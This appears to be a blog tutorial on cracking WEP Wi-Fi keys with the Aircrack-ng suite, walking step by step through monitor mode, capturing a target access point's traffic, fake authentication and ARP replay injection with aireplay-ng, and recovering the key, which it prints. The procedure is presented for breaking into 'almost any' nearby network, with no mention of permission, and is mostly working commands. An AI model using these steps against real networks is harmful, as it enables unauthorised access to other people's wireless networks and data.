What is Aircrack-NG?
Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools.
In fact, Aircrack-ng is a set of tools for auditing wireless networks.
How do i use this tool?
Simple, just follow my tutorial and you'll be able to crack ALMOST any WEP encrypted password.
These are active attacks, which means that you have to be near the target router in order for this to work. About 50% of signal should be good.
Let's Begin.
Open up a terminal and type:
Quote:airmon-ng
Spoiler (Click to Hide)
![[Image: IQDaS.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vkvbsUu5eoeDrdsB8niXevKNCdr2_XCREjaRNSfcv5vcaOG1fjMjr4tu4sWSXxG5lEyEg4ms3CTAIep-vmwHY=s0-d)
This will show you, your wireless card name. In my case it is called wlan1, but i also have wlan0.
Now, we need to set the wireless card in monitor mode, to do that type:
Quote:airmon-ng start wlan1
Ok, your wireless card is now on monitor mode. If you type airmon-ng again, it'll show you mon0
After that, type:
Quote:airodump-ng mon0
Spoiler (Click to Hide)
![[Image: SLbK9.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vITCylBtiEIOSzRtmFZi1gBZoKTGP0_MB-wkkRbh9xTuaF1SQ1YMMWm8hwhJZg1gtKIwXsHZSG_MlVDlLtoQ=s0-d)
When you press enter, it should show you all the Access Points near you.
Copy the BSSID and remember the Channel Number of the target AP.
Press CONTROL+c to cancel. Do this only when you found and copied the info about the target AP.
Spoiler (Click to Hide)
![[Image: PbF3r.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u_BeI_ytHhBrJTSwx_GUowWlLwQrU4LjF8IQ_L76mgqmJ3Ray9anRzL23s4UtzxWN5hlU1dYlYbTDNOF-tq4o=s0-d)
Now, type:
Quote:airodump-ng -c [channel number] --bssid [bssid] -w wep mon0
Spoiler (Click to Hide)
![[Image: WaRxV.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sq7I_zAWwbzVY8t6RkkYFqxmDSJbE_pZ2NLhIqDsSflNDDwHzkBXM-QThY8xkrbLwXU24_Xrb4WwpJNuyJCQ=s0-d)
You should know start recieving DATA.
Spoiler (Click to Hide)
![[Image: oJp5G.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sSfs_PcGX84frwnKuQSMmI36ocFq2P-2Zcv7USoZpw8h0Az5GSFgLI7Y9tiPnUTjY_1o1nv62CkzR962eT7aY=s0-d)
To speed up this proccess, open up another terminal and type:
Quote:aireplay-ng -1 0 -a [BSSID] mon0
After it says it was successfull, type:
Quote:aireplay-ng -3 -b [BSSID] mon0
Spoiler (Click to Hide)
![[Image: n9Eni.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uQsgqK-v1kPdDnMTvMGWi8RjYIyb_UYpRDE3ZW4vMWf3t86Smqwt5nLrTYiLIIOz2Y0KOIEUKxjRfSgmC31Yc=s0-d)
After a some seconds, this should appear:
Spoiler (Click to Hide)
![[Image: yVOlw.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uM7pB0ll5VEFr26kXJmLk43IpO-lt-eFbw4qzQBZQ1MAP_w8XSlb56xlcpUMdFH6KDpKfT1AWTPS8MZO-0xOA=s0-d)
When you reach 20000 of DATA, which will be really quick if you did what i said above, open another terminal and type:
Quote:aircrack-ng wep-01.cap
Now, wait for some minutes and it should give you the PASSWORD!
The password is:
Quote:EF855844B288E4BB1BA9ADF14D
Spoiler (Click to Hide)
![[Image: xKs6P.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uk_JkyGFDereGCr6pRiBF7GjDjd5WxBFSWLxebld0P2cZq8dJqV2L9G36NY6_H2EKyUU43lj6zAXbxpwixL6c=s0-d)
0 comments:
Post a Comment